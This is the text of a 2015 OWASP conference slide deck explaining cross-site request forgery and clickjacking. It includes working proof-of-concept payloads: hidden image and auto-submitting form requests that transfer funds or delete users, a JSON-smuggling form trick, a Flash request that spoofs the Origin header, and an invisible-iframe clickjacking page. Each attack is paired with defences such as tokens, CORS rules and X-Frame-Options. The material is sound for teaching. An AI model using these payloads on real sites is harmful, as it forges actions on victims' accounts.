Cross-site request forgery:Ways to exploit, ways to prevent

Paulius Leščinskas, OWASP EEE Lithuania2015-10-07

About Me

Paulius LeščinskasPod owner @ Adform

http://lescinskas.lt

Paulius.Lescinskas@gmail.com

@lescinskas

https://www.linkedin.com/in/pluton

Cross-site request forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

Thank you http://www.seclab.cs.sunysb.edu/seclab/jcsrf/ for the image.

Cross-site request forgery (CSRF)

Typical impact:

• Initiate transactions (modify data)

• Access sensitive data

Prerequisite: victim MUST be logged-in to the target system.

Typical example:

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

Cross-site request forgery (CSRF)

What about POST?

Cross-site request forgery (CSRF)

Example 2 (POST request):

<form method="post" action="https://www.example.com/deleteUser">

<input type="hidden" name="id" value="1" />

</form>

<script>

document.forms[0].submit();

</script>

Cross-site request forgery (CSRF)

No forms? Just RESTful JSON APIs?

Cross-site request forgery (CSRF)

The same data will be sent differently as raw HTTP body. I.e.:

Name: John Doe

Text: 1 + 2 = 3

• Via HTML form (application/x-www-form-urlencoded):

Name=John+Doe&Text=1+%2B+2+%3D+3

• Using RESTful Web API formatted as JSON:

{"Text": "John Doe", "Text": "1 + 2 = 3"}

Cross-site request forgery (CSRF)

Example 3 (POST JSON request, bypassing x-form-urlencoded structure):

<form method="post" action="https://www.example.com/deleteUser">

<input type="hidden" name='{id: 1, "ignore-me": "' value='test"}' />

</form>

<script>

document.forms[0].submit();

</script>

Data sent:

{"id": 1, "ignore-me": "=test"}

http://itsecurityconcepts.com/2014/04/22/csrf-on-json-requests/

Cross-site request forgery (CSRF)

All HTTP methods (GET/POST/PUT/PATCH/DELETE ...) with any data encoding can be called using Javascript (XmlHttpRequest aka XHR aka Ajax), if your Cross-origin resource sharing (CORS) headers allow you to call XHR from any location:

OPTIONS /foo/bar

Host: example.com

Origin: http://foo.com

Vulnerable if:Access-Control-Allow-Origin: *

jQuery example:

$.ajax({

url: 'http://example.com/foo/bar',

type: 'DELETE',

data: {"id": 1}

success: function(result) {

// Do something with the result

}

});

Cross-site request forgery (CSRF)

Flash to the attack!

Cross-site request forgery (CSRF)

Example 4 (any HTTP-based request using ActionScript):import flash.net.URLRequest;

import flash.net.URLVariables;

import flash.net.URLRequestMethod;

import flash.net.URLRequestHeader;

import flash.net.URLLoader;

var loader:URLLoader = new URLLoader();

var req:URLRequest = new URLRequest("http://www.example.com/deleteUser");

var header:URLRequestHeader = new URLRequestHeader("Origin", "http://www.test.com"); // Setting Origin header valid until Flash 9 somewhat

req.requestHeaders.push(header);

req.method = URLRequestMethod.DELETE;

req.contentType = 'application/json';

req.data = '{"id": 1}';

loader.load(req);

Cross-site request forgery (CSRF)

... valid if example.com has crossdomain.xml like:

<?xml version="1.0"?>

<cross-domain-policy>

<allow-access-from domain="*" secure="false" />

</cross-domain-policy>

9/10 Lithuanian TOP10 websites has such crossdomain.xml

…mostly to load assets from flash-based banner ads.

... also, you can access ActionScript objects, functions and properties from the SWF file, hosted on other domain, if this file has Security.allowDomain("*"); (Cross-scripting)

Cross-site request forgery (CSRF)

Countermeasures

● Synchronizer token pattern!● Check Origin header● Appropriate CORS headers● Appropriate crossdomain.xml rules● Short-living sessions (only reduces likelihood)

Very hard (impossible?) to prevent CSRF is website has XSS vulnerabilities

https://en.wikipedia.org/wiki/Cross-origin_resource_sharing

http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

ClickJacking

ClickJacking

ClickJacking

<html>

<body>

<iframe src="http://victim.site" style="position: absolute; filter:alpha(opacity=0);opacity:0"></iframe>

<div style="position: relative; left: 10px; top: 10px; z-index: -1"><a href="#">CLICK ME</a></div>

</body>

</html>

OVERRIDES ALL CSRF PROTECTIONS!

https://www.owasp.org/index.php/Clickjacking

http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html

https://community.qualys.com/blogs/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole

ClickJacking

Countermeasures

Framebusting: X-Frame-Options (XFO) response HTTP header or meta http-equiv tag

X-Frame-Options: DENY (disallows page to be loaded in IFRAME)

X-Frame-Options: SAMEORIGIN (allows page to loaded in IFRAME from same origin)

X-Frame-Options: ALLOW-FROM https://trusted.domain (allows page to be loaded from specific origins; unsupported by Chrome and Safari!)

Worldwide usage:

Facebook: DENY, Twitter: SAMEORIGIN, Github: DENY, 60% of Alexa Top 10 use framebusting...

https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet (+more defense techniques)

https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)

https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options

Thank you!